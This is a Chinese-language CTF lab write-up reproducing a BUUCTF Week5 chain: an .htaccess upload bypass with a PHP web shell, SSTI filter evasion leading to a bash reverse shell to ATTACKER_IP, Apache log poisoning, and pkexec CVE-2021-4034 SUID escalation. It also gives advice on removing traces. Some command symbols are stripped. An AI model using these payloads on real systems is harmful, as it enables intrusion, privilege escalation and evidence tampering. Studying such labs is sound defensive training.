当前位置: 首页 > news >正文

新手也能看懂的CTF靶场通关笔记:从.htaccess上传到SUID提权,手把手复现BUUCTF Week5

新手也能看懂的CTF靶场通关笔记从.htaccess上传到SUID提权手把手复现BUUCTF Week5第一次接触CTF比赛时看到那些复杂的漏洞利用链总有种看天书的感觉。直到自己动手在虚拟机里复现了整个攻击流程才真正理解每个技术细节的奥妙。本文将用最直白的语言带你一步步还原BUUCTF Week5中的经典漏洞链——从看似无害的.htaccess文件上传到最终获取服务器最高权限的SUID提权。我们不会跳过任何理所当然的步骤每个命令都会解释清楚它的作用就像有位经验丰富的队友在你耳边耐心指导。1. 环境准备与基础概念在开始实战前我们需要搭建一个与比赛环境相似的靶场。推荐使用VirtualBox配合Vagrant快速部署Ubuntu 22.04环境这样既能隔离实验环境又方便随时重置系统。以下是基础配置步骤# 安装VirtualBox和Vagrant sudo apt update sudo apt install -y virtualbox vagrant # 创建靶机目录并初始化 mkdir buuctf-week5 cd buuctf-week5 vagrant init ubuntu/jammy64 vagrant up vagrant ssh为什么选择Ubuntu 22.04因为这个LTS版本长期维护且软件包较新能更好复现现代CTF场景。接下来安装必要的服务组件# 安装Apache、PHP和相关组件 sudo apt install -y apache2 php libapache2-mod-php \ php-curl php-gd php-mbstring php-xml php-zip注意实际比赛环境可能使用特定PHP版本若遇到语法差异可尝试切换版本sudo apt install php7.4 sudo a2dismod php8.1 sudo a2enmod php7.4理解几个关键术语将帮助后续操作.htaccessApache服务器的分布式配置文件可覆盖主配置SSTIServer-Side Template Injection服务端模板注入漏洞SUIDSet User ID特殊文件权限允许以所有者身份执行2. .htaccess文件上传漏洞实战比赛中的第一个突破口往往是最容易被忽视的地方。这次的目标网站存在文件上传功能但限制了可上传的文件类型。常规绕过方法失效后.htaccess成了突破口。2.1 制作恶意.htaccess文件创建一个文本文件并写入以下内容FilesMatch shell.jpg SetHandler application/x-httpd-php /FilesMatch这个配置会让Apache将所有名为shell.jpg的文件当作PHP脚本解析。用十六进制编辑器查看文件头可以理解其工作原理xxd -g 1 .htaccess 00000000: 3c 46 69 6c 65 73 4d 61 74 63 68 20 22 73 68 65 FilesMatch she 00000010: 6c 6c 2e 6a 70 67 22 3e 0a 20 20 20 20 53 65 74 ll.jpg. Set 00000020: 48 61 6e 64 6c 65 72 20 61 70 70 6c 69 63 61 74 Handler applicat 00000030: 69 6f 6e 2f 78 2d 68 74 74 70 64 2d 70 68 70 0a ion/x-httpd-php. 00000040: 3c 2f 46 69 6c 65 73 4d 61 74 63 68 3e 0a /FilesMatch.2.2 上传与验证使用Burp Suite拦截上传请求修改Content-Type为text/plain。上传成功后再上传一个包含PHP代码的jpg文件?php system($_GET[cmd]); ?访问这个jpg文件时添加URL参数?cmdid如果返回当前用户信息说明漏洞利用成功。常见问题排查问题现象可能原因解决方案500内部错误Apache配置限制检查AllowOverride设置文件被删除安全防护扫描尝试使用.htpasswd等变体无执行效果文件路径错误确认上传目录有执行权限3. SSTI十六进制绕过技巧获得初步立足点后我们在网站搜索功能发现了疑似模板注入点。但常规测试字符被过滤这时需要十六进制编码绕过。3.1 识别SSTI漏洞先测试基础注入语法原始输入被过滤{{7*7}} → 返回49 → 存在SSTI但直接使用{{config}}等敏感操作会被拦截。通过十六进制编码可以绕过# 将payload转换为十六进制 {{config}}.encode(hex) # 得到7b7b636f6e6669677d7d在注入点输入\x7b\x7b\x63\x6f\x6e\x66\x69\x67\x7d\x7d3.2 利用SSTI获取Shell成功绕过过滤后构造反向Shell连接{% for x in ().__class__.__base__.__subclasses__() %} {% if Popen in x.__name__ %} {{ x([/bin/bash,-c,bash -i /dev/tcp/ATTACKER_IP/4444 01],stdout-1).communicate() }} {% endif %} {% endfor %}将上述代码转换为十六进制后分段注入。在攻击机监听nc -lvnp 4444提示如果网络限制导致反向Shell失败可尝试用Python创建简易HTTP服务器传输文件python3 -m http.server 80004. 权限提升从www-data到root拿到普通用户权限后我们开始寻找提权路径。首先收集系统信息# 查看内核版本 uname -a # 查找SUID文件 find / -perm -4000 -type f 2/dev/null # 检查可写目录 find / -writable 2/dev/null | grep -v proc4.1 利用Apache日志污染当常规SUID提权路径被封堵时可以尝试通过污染Apache日志执行代码# 定位日志路径 ps aux | grep apache cat /etc/apache2/envvars | grep LOG # 在User-Agent中注入PHP代码 curl -A ?php system(id); ? http://localhost # 包含日志文件执行 php -r include(/var/log/apache2/access.log);4.2 最终SUID提权发现系统安装了较旧版本的pkexec存在已知漏洞# 下载漏洞利用代码 wget http://example.com/CVE-2021-4034.c -O /tmp/pwn.c gcc /tmp/pwn.c -o /tmp/pwn # 执行提权 /tmp/pwn whoami # 现在应该是root如果编译环境缺失可以尝试预编译的二进制文件。以下是常见SUID提权目标对比程序名称利用难度影响范围修复方案pkexec低Polkit 0.105更新到最新版passwd中配置错误修正权限mount高特定文件系统禁用SUID5. 痕迹清理与防御建议完成挑战后别忘了清理入侵痕迹。删除创建的.htaccess文件、Web Shell和日志中的敏感条目。对于防御方建议禁用不必要的.htaccess覆盖功能对上传文件进行内容检测而非仅依赖扩展名定期更新系统组件修补已知漏洞使用最小权限原则运行服务最后分享一个实用技巧在虚拟机中为每个实验创建快照这样可以在不同阶段自由回溯而不用每次都从头搭建环境。
http://www.gsyq.cn/news/1328214.html

相关文章:

  • 别再到处找了!26个遥感变化检测数据集,从LEVIR-CD到SpaceNet7,我帮你整理好了下载链接和避坑指南
  • 工厂员工入转调离全流程自动化实操方法 | 2026企业级实在Agent深度实践指南
  • 告别sasquatch报错:手把手教你用squashfs-tools 4.5+搞定binwalk解压LZMA固件
  • 手教你在 Simulink 中实现这一符合电网标准的关键控制策略
  • 如何快速掌握m4s-converter:B站缓存视频无损合并的完整指南
  • 构建企业级招聘管理系统的开源解决方案
  • Arduino入门教程六|串口发送数值控制LED亮度(含Serial.parseInt()详解)
  • B站缓存视频转换利器:m4s-converter完整使用指南
  • 杭州婚纱照避坑指南|小众出片地+靠谱机构推荐,定格江南质感婚照 - 江湖评测
  • 别再手动改代码了!用Vue3+Element Plus+ECharts快速搭建一个动态图表配置后台
  • CAN DBC文件实战:手把手教你用CANdb++为OBD诊断信号建模(含Value Tables技巧)
  • 别再乱调SCALE_SCH了!从基-2、基-4到流水线,不同FFT架构的缩放策略全解析
  • 收藏!小白程序员也能抓住的AI红利:AI大模型应用开发入门指南
  • 长春万足金回收银戒指回收铂金戒指回收碎钻回收奢侈品首饰回收本地排名正规门店专业推荐哪家靠谱二手哪家强 - 检测回收中心
  • AI Agent到底是什么
  • 2026 年珠三角广东等地区飞机盒五大品牌排名及解析,全方位解析各品牌核心竞争力与市场布局逻辑 - 十大品牌榜
  • Adobe-GenP 3.0终极指南:5分钟免费激活Adobe全家桶
  • 从74HC374到ISP1016:拆解TEC-4数据通路实验背后的芯片与数字逻辑设计
  • Windows下用Neo4j Desktop还是社区版?我的选择与完整配置心得分享
  • 用Luceda IPKISS搞定MZI晶格滤波器:从版图绘制到S参数仿真的保姆级流程
  • 给 Agent 加一个可靠的知识检索层:从向量引擎到 RAG 工作流的实践笔记
  • 解密RePKG:壁纸引擎资源提取与转换的深度实践
  • PDF转Word,这10个工具真的好用又不踩坑!
  • 益阳旧黄金回收旧银饰回收PT950铂金回收钻戒回收金银铂钻回收高价多少钱一克同城价格查询上门上门估价闲置变现转让靠谱权威排行榜 - 检测回收中心
  • SPT-AKI存档编辑器:打破《逃离塔科夫》单机版成长壁垒的专业工具
  • 天津黄金项链回收老银器回收旧铂金回收1克拉钻石回收二手铂金回收本地排名正规门店专业推荐哪家靠谱二手哪家强 - 检测回收中心
  • 面试官:Zookeeper 的典型应用场景有哪些?你能说上来几个?
  • ARM SME指令集UMLSL多向量运算详解
  • WINCC flexible在西门子全集成自动化中的核心价值与工程实践
  • 深度学习架构可视化新范式:Neural-Network-Architecture-Diagrams如何重塑神经网络设计工作流